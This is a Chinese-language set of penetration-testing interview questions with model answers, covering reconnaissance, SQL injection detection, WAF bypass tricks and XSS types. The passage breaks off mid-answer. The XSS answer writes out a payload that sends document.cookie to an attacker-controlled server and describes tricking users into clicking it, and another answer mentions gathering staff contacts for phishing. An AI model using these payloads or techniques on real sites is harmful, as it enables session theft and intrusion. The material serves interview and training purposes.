渗透测试面试题及答案.docxVIP

渗透测试面试题及答案

一、基础实操类（入门必问）

1.请说说你平时做渗透测试，信息收集阶段都会做哪些事？（重点说实操，别只列工具）

答案：首先先明确目标范围（避免越权），然后分几步来：第一步，先查域名相关信息，比如用whois查注册人、联系方式、DNS服务器，再用dig或nslookup查A记录、CNAME、MX记录，顺便找子域名——除了用oneforall、subfinder这些工具，还会手动看目标官网的备案信息、页面源码里的隐藏子域名，甚至逛目标公司的招聘信息、技术博客，有时候会藏着测试环境的域名。第二步，查IP段，把收集到的域名解析成IP，然后用masscan扫存活主机，再用nmap做细扫，比如-T4端口扫描，顺便探测操作系统版本、开放服务（比如80、443、3389、22这些常用端口，还有一些冷门端口比如8080、9090可能藏着后台）。第三步，应用层信息，访问目标网站，看robots.txt、sitemap.xml，存下页面源码，用burp抓包看响应头里的服务器版本、中间件信息（比如Apache、Nginx、Tomcat），还有前端页面里的接口地址、参数名，甚至找有没有泄露的测试账号、注释里的密码。另外，还会查目标公司的社交账号、员工信息，比如LinkedIn、企查查，有时候员工的邮箱、手机号能用到后续的钓鱼或爆破里。

2.拿到一个网站，你怎么判断它有没有SQL注入漏洞？实操中常用的判断方法和绕过技巧有哪些？

答案：首先看网站的参数传递方式，GET和POST参数都要测。判断方法最基础的就是加单引号、双引号，看页面有没有报错（比如MySQL的YouhaveanerrorinyourSQLsyntax，SQLServer的MicrosoftOLEDBProviderforSQLServer），或者页面内容有没有变化、卡死。如果没报错，就用逻辑判断，比如在参数后加and1=1、and1=2，看返回结果是否一致——一致可能有注入，不一致大概率存在。还有时间盲注的判断，加andsleep(5)，看页面响应时间是否明显变长，适合没有回显的情况。

绕过技巧的话，实操中遇到最多的是过滤关键字，比如select、union被拦，这时候可以用大小写混合（比如sElEcT、UnIoN），或者加注释符绕过（比如sel/*abc*/ect，--+、#注释掉后面的内容）；如果过滤了单引号，试试用双引号、括号包裹参数（比如id=1or1=1--+），或者用十六进制编码（比如把admin编码成0x61646D696E）；还有遇到WAF拦截的话，试试分块传输、改请求头（比如加X-Forwarded-For伪装IP），或者用盲注代替union注入，因为盲注交互少，更容易绕过WAF。

3.XSS漏洞分哪几种？你在实际测试中，怎么利用XSS获取用户Cookie？

答案：主要分存储型、反射型、DOM型三种。反射型是最常见的，参数里的恶意代码直接被页面反射回来执行，比如搜索框、URL参数；存储型是恶意代码存到数据库里，比如评论区、留言板，每次页面加载都会执行，危害更大；DOM型是通过修改页面的DOM结构触发，比如通过document.write、location.hash这些方法，不用和服务器交互，只在客户端执行。

实操中获取Cookie的话，首先要构造XSSpayload，核心是让目标页面加载我们的恶意脚本，把Cookie发送到自己的服务器。比如先搭一个简单的HTTP服务器（用python的python-mhttp.server8080就行），然后构造payload：scriptdocument.location.href=http://我的IP:8080/cookie?c=+document.cookie/script。然后找有XSS漏洞的地方，比如反射型的搜索框，把payload填进去，诱导用户点击这个URL（比如伪装成正常链接），用户点击后，页面会执行脚本，把Cookie发送到我们的服务器，我们在服务器日志里就能看到Cookie了。如果是存储型XSS，直接把payload发到评论区，只要有用户访问这个页面，Cookie就会被获取。另外，有时候Cookie有HttpOnly属性，这时候脚本拿不到Cookie，就需要结合其他漏洞，比如结合CSRF漏洞，或者诱导用户输入账号密码。

二、进阶应用类（有经验必问）

1.测试一个登录界面，你会从哪些角度进行渗透？除了爆破密码，还有哪些常见漏洞？

答案：首先先看基础的账号密码爆破——先收集可能的账号（比如admin、test、客服邮箱前缀），然后用字典爆破，同时看有没有验证码机制：验证码是否可以复用、是否容易识别（比如简单的数字字母，用OCR工具就能破）、是否有